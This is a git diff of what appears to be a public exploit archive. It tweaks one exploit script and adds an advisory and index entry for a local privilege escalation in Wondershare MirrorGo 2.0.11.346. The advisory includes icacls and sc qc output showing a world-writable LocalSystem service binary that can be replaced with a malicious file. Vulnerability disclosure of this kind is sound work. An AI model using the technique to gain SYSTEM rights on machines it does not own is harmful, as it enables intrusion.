diff --git a/exploits/windows/local/50130.py b/exploits/windows/local/50130.py index 8d23c7d42..49b14b61a 100755 --- a/exploits/windows/local/50130.py +++ b/exploits/windows/local/50130.py @@ -21,7 +21,7 @@ characters = { 'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j', '906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o', '7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t', -'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z'} +'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z','!':'B398'} # ASCII art is important xD banner = ''' diff --git a/exploits/windows/local/50787.txt b/exploits/windows/local/50787.txt new file mode 100644 index 000000000..4cbce2d12 --- /dev/null +++ b/exploits/windows/local/50787.txt @@ -0,0 +1,47 @@ +# Exploit Title: Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions +# Discovery by: Luis Martinez +# Discovery Date: 2022-02-23 +# Vendor Homepage: https://www.wondershare.com/ +# Software Link : https://download.wondershare.com/mirror_go_full8050.exe +# Tested Version: 2.0.11.346 +# Vulnerability Type: Local Privilege Escalation +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Privilege Escalation: + +# Insecure folders permissions issue: + +C:\>icacls "C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\*" | findstr /i "everyone" | findstr /i ".exe" + + +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\adb.exe Everyone:(I)(F) +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\BsSndRpt.exe Everyone:(I)(F) +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall32.exe Everyone:(I)(F) +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\DriverInstall64.exe Everyone:(I)(F) +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe Everyone:(I)(F) +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\MirrorGo.exe Everyone:(I)(F) +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe Everyone:(I)(F) +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ProcessKiller.exe.config Everyone:(I)(F) +C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\unins000.exe Everyone:(I)(F) + +# Service info: + +C:\>sc qc ElevationService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ElevationService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\Wondershare MirrorGo\ElevationService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare Driver Install Service help + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A vulnerability was found in Wondershare MirrorGo 2.0.11.346. The Wondershare MirrorGo executable +"ElevationService.exe" has incorrect permissions, allowing a local unprivileged user to replace it +with a malicious file that will be executed with "LocalSystem" privileges. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9336d3ff4..6a7a2374b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11453,6 +11453,7 @@ id,file,description,date,author,type,platform,port 50765,exploits/windows/local/50765.txt,"HMA VPN 5.3 - Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows, 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",1970-01-01,ibby,local,hardware, 50776,exploits/windows/local/50776.txt,"Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path",1970-01-01,"Johto Robbie",local,windows, +50787,exploits/windows/local/50787.txt,"Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions",1970-01-01,"Luis Martínez",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139